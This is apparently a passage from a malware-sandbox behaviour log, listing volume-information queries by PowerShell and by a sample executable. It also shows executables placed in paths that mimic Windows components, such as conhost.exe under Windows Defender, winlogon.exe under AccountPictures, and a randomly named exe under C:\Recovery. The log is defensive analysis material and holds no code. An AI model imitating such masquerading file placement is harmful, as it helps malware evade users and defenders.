                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Users\user\Desktop\4si9noTBNw.exe VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Users\user\Desktop\4si9noTBNw.exe VolumeInformation
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeQueries volume information: C:\Program Files\Windows Defender\en-GB\conhost.exe VolumeInformation
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeQueries volume information: C:\Program Files\Windows Defender\en-GB\conhost.exe VolumeInformation
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeQueries volume information: C:\Recovery\VTixufCejPQZEvXiB.exe VolumeInformation
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeQueries volume information: C:\Program Files\Windows Defender\en-GB\conhost.exe VolumeInformation
                            Source: C:\Users\Public\AccountPictures\winlogon.exeQueries volume information: C:\Users\Public\AccountPictures\winlogon.exe VolumeInformation
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeQueries volume information: C:\Program Files\Windows Defender\en-GB\conhost.exe VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Users\user\Desktop\4si9noTBNw.exe VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
